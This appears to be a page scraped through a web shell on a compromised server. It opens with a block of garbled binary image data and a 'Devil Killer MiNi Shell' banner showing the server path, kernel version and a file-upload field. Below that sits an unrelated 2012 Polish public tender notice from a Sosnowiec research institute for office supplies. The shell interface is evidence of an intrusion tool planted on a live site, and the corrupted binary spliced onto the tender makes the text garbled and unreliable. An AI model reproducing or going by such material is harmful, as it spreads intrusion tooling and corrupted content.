JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120521/164556-N-2012.html

<p class="kh_header"><b>Sosnowiec: Sukcesywna dostawa materiałów biurowych</b><br>
<b>Numer ogłoszenia: 164556 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1 

Lp.	Asortyment	Ilość                      
1.		Kalkulator
12 pozycji wyświetlacz podwójny  wymiar 125x100x34	10szt
2.		Kalkulator 8pozycji wyświetlacz, wym. 107x127x32,7mm	10szt
3.		Przenośna  pamięć  USB 8GB	10szt
4.		Podkładka pod mysz	10szt


Pakiet 2

Lp.	Asortyment	Ilość                    
1.		     Płyty CD - R 700 MB   pakowane po 100szt	6op
2.		 Płyta  CD-RW 700MB pakowane po 10szt	6op
a.	35	Koperta  papierowa do płyt CD	 600szt
3.		Płyta DVD - R  pakowane po 100szt	2op
4.		Ściereczki nasączane do powierzchni plastikowych, pakowane pojedynczo	50szt
5.		Okładki do bindowania błyszczące  250g/m2
Pakowane po 100szt	20 op
6.		Folia  do bindowania bezbarwna 150mic
pakowana po 100szt	20 op
7.		Grzbiety plastikowe do bindowania 10mm  czarne
pakowane po 100szt	4 op
8.		   Grzbiety plastikowe do bindowania 12,5mm czarne
          pakowane   po 100szt	6 op
9.		 Grzbiety plastikowe do bindowania14mm  czarne
pakowane po 100szt	4 op
10.		 Grzbiety plastikowe do bindowania 19mm czarne
pakowane po 100szt	6 op
11.		Folia do laminowania  A4  160 micronów, 
opakowanie 100 szt	5 op

Pakiet 3

Lp.	Asortyment	Ilość                    
1.		Ws  wskaźnik laserowy, kolor czerwony, zasięg       1   00 m, mały, lekki, 15 g, obudowa plastikowa	5szt
2.		bloki do flipchartów kratka,	10szt
3.		bloki do flipchartów gładki	10 szt

Pakiet 4

Lp.	Asortyment	Ilość                    
1.		        tablica korkowa  w ramie drewnianej  30x40	2szt
2.		tablica korkowa  w ramie drewnianej  50x80	7szt
3.		tablica korkowa  w ramie drewnianej   60x90	7szt
4.		tablica korkowa  w ramie drewnianej  120x80	7szt

 Pakiet 5


Lp.	Asortyment	Ilość                    
1.		segregator A4  2 zaczepowy
grzbiet  szerokość  50mm  
wykonany z twardej kolorowej tektury pokryty okleiną 
wzmocniony metalowymi okuciami , z miejscem na wymienną etykietę na grzbiecie	150szt
2.		segregator A4  2 zaczepowy
grzbiet  szerokość  75mm
wykonany z twardej kolorowej tektury pokryty okleiną 
wzmocniony metalowymi okuciami, z miejscem na wymienną etykietę na grzbiecie	300szt
3.		 segregator A4  2 zaczepowy
grzbiet  szerokość  200 -250 mm wykonany z twardej kolorowej tektury pokryty okleiną 
wzmocniony metalowymi okuciami, z miejscem na wymienną etykietę na grzbiecie	50szt
4.		        segregator   A5  grzbietu  szerokość 75 mm wykonany z twardej kolorowej tektury pokryty okleiną 
wzmocniony metalowymi okuciami, z miejscem na wymienną etykietę na grzbiecie	20szt
5.		    segregator A4 grzbiet szerokość.  350mm
wykonany z twardej kolorowej tektury pokryty okleiną 
wzmocniony metalowymi okuciami, z miejscem na wymienną etykietę na grzbiecie	70szt




Pakiet 6

Lp.	Asortyment	Ilość                    
1.		separatory kartonowe 1/3 A4  kolor  czerwony   niebieski, żółty ,zielony	110szt
2.		przekładki plastikowe format  A4
1-20 kart	10 szt
3.		przekładki  plastikowe format  A4
10 kart	10 szt
4.		przekładki plastikowe format  A4
do   12 kart	15 szt
5.		koszulka krystaliczna  A4 PP pakowane po 100szt	300op
6.		skoroszyt PCV A4  zawieszany w  różnych
kolorach  z przeźroczystą przednią okładką i kolorowym spodem, pakowany po10szt	300  op
7.		ofertówka  krystaliczna A4 bezbarwna  z folii
o gr.150mic pakowana po 25szt/obwoluta/	100 op
8.		Koszulka z klapką na rzep format A4  wym235x16,4x322  pakowane po 3 szt	20 op
9.		Przekładki plastikowe format  A4
Literowe A-Z	20 op
10.		Mechanizm skoroszytowy  umożliwia  spinanie luźnych kartek opakowanie 25 szt	100 op
11.		Teczka z rączką  szerokość grzbietu 100mm	100 szt
12.		Teczka z rączką szerokość  grzbiet 40 mm	10 szt
13.		Teczka  biała  z kartonu o gr 450g wiązana A4	500 szt
14.		Teczka  biała  z kartonu o gr 450g z gumką A4	500 szt
15.		Teczka z gumką wykonana z kartonu o gran. 350g     różne kolory  - lakierowana A4	400 szt




Pakiet 7

Lp.	Asortyment	Ilość                    
1.		pudełko archiwizacyjne  A4 grzbiet 88mm poj. 800 kartek  323x264x80mm	20szt
2.		  pudło archiwizacyjne  zbiorcze  431x333x294
gramatura 385g/m2 mieści 5 pudełek po 80mm	5 szt
3.		pojemniki kartonowy na czasopisma szerokość grzbietu 75 mm	50szt
4.		pojemnik PCV na czasopisma grzbiet 70mm	40szt




Pakiet 8

Lp.	Asortyment	Ilość                    
1.		Książka do podpisu A4   10 przegródek	5szt
2.		Książka korespondencyjna 192 kart	10szt
3.		Książka korespondencyjna 96 kart	5szt
4.		Przybornik na kartki  350szt format 90x90mm
przeźroczysty	10szt
5.		Przybornik na biurko plastikowy	10szt
6.		Półka biurowa przeźroczysta i dymna  na dokumenty	50szt




Pakiet 9

Lp.	Asortyment	Ilość                    
1.		 Tusz do pieczątek     czarny	40 szt.
2.		Tusz do pieczątek     czerwony	3 szt.
3.		Tusz do pieczątek     niebieski	5 szt
4.		Dziurkacz  biurowy, metalowy z linijką na min 50 kartek	3 szt
5.		Dziurkacz  biurowy, metalowy z linijką na min 10 kartek	10 szt
6.		Zszywacz biurowy na zszywki 24/6 , części mechaniczne wykonane z metalu  ładowany od góry 	50 szt
7.		Zszywki   biurowe 24/6   pakowane po 1000szt
w opakowaniu	200 op
8.		Zszywki   biurowe 26/6   pakowane po 1000szt
w opakowaniu	10 op
9.		Zszywacz długoramienny, metalowy,skala dł. 300 mm wyskalowana w cm, gwarancja 3 lata ,zszywa 10 kartek 24/6  ,26/6	10 szt
10.		Spinacze metalowe  okrągłe   , długość 
28 mm  pakowane po 100szt	200 op
11.		Spinacze  50 mmm owalne  pakowane po 100szt	100 op
12.		Nożyczki  biurowe ze stali nierdzewnej
o dł. 15,5cm  z rękojeścią z nie łamliwego  plastiku	30 szt
13.		Nożyczki  biurowe ze stali nierdzewnej o  dł 21 cm  z rękojeścią z nie łamliwego  plastiku	50 szt



Pakiet 10


Lp.	Asortyment	Ilość                    
1.		Sznurek jutowy  pakowany po 10dkg	50szt
2.		Papier pakowy szary arkusz o wymiarach 1mx70cm	500szt



Pakiet 11

Lp.	Asortyment	Ilość                    
1.		Taśma pakowa przeźroczysta i brązowa  wym. 48mmx50m   samoprzylepna	100szt
2.		Taśma dwustronna pokryta klejem akrylowym
20mm x10m	20szt
3.		Taśma dwustronna pokryta klejem akrylowym
38mm x10m	20szt
4.		Taśma dwustronna pokryta klejem akrylowym
50mmx10 m	10szt
5.		Taśma biurowa  18mm x10m samoprzylepna opakowanie  8 szt	30 op
6.		Taśma biurowa  12mm x10m samoprzylepna opakowanie 12 szt	30 op
7.		Taśma biurowa   24mm x10m samoprzylepna
pakowana po 6 szt	30 op
8.		Taśma dwustronna szer. 50 mm x10m samoprzylepna	15 szt
9.		Taśma samoprzylepna  19mmx33m	20 szt
10.		Taśma dwustronna szer. 18 mm x 5m samoprzylepna	20 szt
11.		Klej w sztyfcie 15 g bezbarwny, posiada atest PZH
do klejenia papieru, tektury, gwarancja 2 lata	1000 szt
12.		Klej w tubce poj. 40ml	150 szt
13.		Klej  typu super glue	20 szt




Pakiet 12


Lp.	Asortyment	Ilość                    
1.		klipsy  metalowe do papieru 19mm  /12 szt/	40 op
2.		Klipsy metalowe do papieru 25mm / 12szt/	40 op
3.		Klipsy metalowe do papieru 32mm / 12szt/	50 op
4.		Klipsy  metalowe do papieru  50mm  /12szt/	60 op
5.		Magnesy na tablicę 15mm/po 10 szt/	30 op
6.		Pinezki do tablic korkowych	20 op
7.		Szpilki	30 op
8.		Pinezki	15 op
9.		Gumka do usuwania śladów ołówka	40 szt
10.		Temperówka  pojedyncza ,stalowe ostrze, mocowane wkrętem, ostrze precyzyjnie połączone z obudową	40 szt
11.		Gwoździe  kolorowe do tab.	10 op



Pakiet 13


Lp.	Asortyment	Ilość                    
1.		długopis   niebieski, plastikowy,  przeźroczysty
z końcówką metalową, o grubości 1,0 mm, nie gorszy niż BIC długośc pisania 2000m	700 szt
2.		długopis czerwony plastikowy,  przeźroczysty
z końcówką metalową 1mm długość pisania  2000m
nie gorszy niż BIC	300 szt
3.		długopis zielony plastikowy,  przeźroczysty
z końcówką metalową 1mm długość pisania
2000m nie gorszy niż BIC	50 szt
4.		długopis czarny  plastikowy,  przeźroczysty
z końcówką metalową 1mm długość pisania 2000m nie gorszy niż BIC	50 szt
5.		długopis  niebieski  na przycisk zintegrowany z klipsem szerokość linii pisania M 0.4	400 szt
6.		długopis niebieski, automatyczny z przezroczystym korpusem, grubość linii 3 mm	50 szt
7.		długopis z olejowym wkładem, grubość linii 0,27 mm, obudowa krystaliczna	10 szt
8.		cienkopis kulkowy  niebieski, gumowy uchwyt
w kolorze atramentu, szerokość pisania 0,3 mm,
suwak z metalowym klipsem	150 szt
9.		cienkopis  grubość linii 0,4mm nie gorszy
niż Staedter w kolorach  niebieski czerwony,
zielony	200 szt
10.		Cienkopis kulkowy , szerokość pisania 0,3 mm, długość linii pisania 1300 m; wykonany w technologii V-system , przeznaczony do pisania po wszystkich rodzajach papieru, zawierający błyskawicznie zasychający tusz	30 szt
11.		Pióro żelowe, w kolorach niebieski ,czerwony, zielony, czarny
nie gorsze niż Point Office G 3006	1000 szt
12.		Foliopisy  CD  szerokość 1 mm, wodoodporny	120 szt
13.		dermatografy kredki	10 szt
14.		wkłady typu Zenit w kolorze niebieskim i czerwonym	100 szt
15.		ołówek HB niełamliwy grafit, nie gorszy niż BIC	200 szt
16.		grafit do ołówka automatycznego 0.5	3 szt
17.		marker wodoodporny końcówka  ścięta i okrągła kolor czarny można pisać po każdego rodzaju powierzchni szerokość linii 1-5mm nietoksyczny, nie gorszy niż Leviatan 2160	300 szt
18.		marker biały wodoodporny	10 szt
19.		marker do opisywania pościeli wodoodporny	60 szt
20.		Marker czarny do szkła odporny na światło i wodę  dobrze kryjący końcówka 1mm nie gorszy
niż edding 8040	200 szt
21.		marker o stylistyce pióra ,szybko schnący odporny na wodę ,piszący po każdej powierzchni, grubość linii Twin Tip UF 0,3mm/Fo.5mm  kolor czarny nie gorszy niż Sharpie	50 szt
22.		zakreślacz  w  kolorach: czerwony, żółty, zielony, pomarańczowy	200 szt
23.		korektor w taśmie	50 szt
24.		marker czerwony wodoodporny	10 szt
25.		korektor w  płynie z pędzelkiem	70 szt
26.		korektor w piórze	30 szt
27.		linijka 20cm   wykonana z polistyrenu	15 szt
28.		linijka 30cm   wykonana z polistyrenu	20 szt
29.		linijka 50cm   wykonana z polistyrenu	10 szt
30.		Ekierka	10 szt


Pakiet 14 


Lp.	Asortyment	Ilość                    
1.		koperta   biała B5  176x250 samoprzylepna
z paskiem pakowana po 100szt	100 op
2.		koperta  biała  B4 250x353 samoprzylepna pakowana po 100szt z paskiem	150 op
3.		koperta   biała C4 229x324 samoprzylepna, pakowana po 100szt	75 op
4.		koperta    biała C6  114x162,samoprzylepne, pakowane po 1000 szt	22 op
5.		koperta  biała C5 162x229,samoprzylepne,
pakowane po  100szt	150 op
6.		koperta z rozszerzanym bokiem  biała    E4 280x400x40	500 szt.
7.		Koperta z rozszerzanym bokiem brązowa C4 229x324x38	200szt
8.		koperta szara 350x430  pakowane po 100szt	40 op
9.		koperta szara 245x305 pakowane po 100szt	40 op
10.		koperta szara 180x245 pakowane po 100szt	4 op
11.		Koperta samoklejąca z paskiem  162x229 
(business mail C5p) 	7000szt
12.		koperta bąbelkowa  C5  /13 pakowane po 100szt	40 op
13.		koperta bąbelkowa A4/17 / pakowane po 100szt	50 op
14.		koperta DL  pakowana  po 100szt	4 op




Pakiet 15

Lp.	Asortyment	Ilość                    
1.		kostka biała 8.5x8.5x4    klejona pakowana po 12	10 op
2.		kostka biała 8.5x8.5x4    pakowana po 12	50 op
3.		pojemnik plastikowy z wkładem 8.5x8.5 8.5	10szt
4.		karteczki samoprzylepne 75x75	200 szt
5.		karteczki samoprzylepne  40x50/ pakowane po 3 szt.	150 op
6.		znaczniki  samoprzylepne w neonowych kolorach 5 bloczków 15x50 po 100 znaczników	30 op
7.		strzałki indeksujące samoprzylepne w 4 kolorach, 12x 43 mm pakowane po 24 szt.	20 op
8.		teczka A4 z klipem	40szt
9.		deska A4 ze wzmocnionym klipem
	16szt


Pakiet 16

Lp.	Asortyment	Ilość                    
1.		papier A4  granulacja 80g/mm  białość 146CIE do wysokonakładowych  drukarek i kopiarek  /ryza 500 arkuszy	3000 ryz
2.		papier A3 granulacja 80g/mm  do wysokonakładowych  drukarek i kopiarek  500arkuszy ryza, 146CIE	50ryz
3.		rolka do faksu    210 x30, pakowana po 6 rolek	10op
4.		zeszyt  w  kratkę  A5  96 stron twarda okładka	200szt
5.		zeszyt  w kratkę  A4 96 stron twarda  okładka	250szt
6.		zeszyt  B5  160 stron  twarda okładka	40szt
7.		zeszyt A5 32 str . kratka	20 szt
8.		Kołonotatnik A4 120 kartkowy w kratkę	10 szt
9.		Kołonotatnik A5   kratka 50 kartek	10 szt
10.		skorowidz A4 200 kartek twarda okładka	10 szt
11.		skorowidz A4  twarda okładka, 96 kart.	10 szt
12.		blok notatnikowyA4 z perforacja i dziurkami do wpięcia
100 kartkowy	100 szt
13.		blok notatnikowy  A5 z perforacją , 50 kartek	60 szt
14.		blok notatnikowy  A4 z perforacją , 50 kartek	60 szt
15.		Blok techniczny A4	30 szt
16.		papier kolorowy samoprzylepny w bloku A4	20 szt
17.		blok milimetrowy format A4 10 kart	40 szt
18.		Kalka ołówkowa A4	5 op
19.		Etykiety samoprzylepne białe format A4 pakowane po 100szt do wszystkich typów drukarek	5 op





Pakiet 17

Lp.	Asortyment	Ilość                    
1.		Biuwary z kalendarzem	20 szt

Pakiet 18

Lp.	Asortyment	Ilość                    
1.		Składanka komputerowa 240x12x2, w kartonie 900 składanek	24 szt.
2.		Składanka komputerowa 375x12x2, w kartonie 900 składanek	5 szt.
3.		Kupony RUM  do drukarki igłowej	10 szt.


Pakiet 19


Lp.	Asortyment	Ilość                    
1.		Woreczki strunowe 120x180mm	      700 szt.
2.		Woreczki strunowe 300x400mm	500 szt.
3.		Woreczki strunowe 100x1200mm	400szt
4.		Woreczki strunowe 100x150mm	400szt
5.		Woreczki strunowe 150x200mm	400szt
6.		Woreczki strunowe 250x200mm	400szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmian zapisów umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl<br>
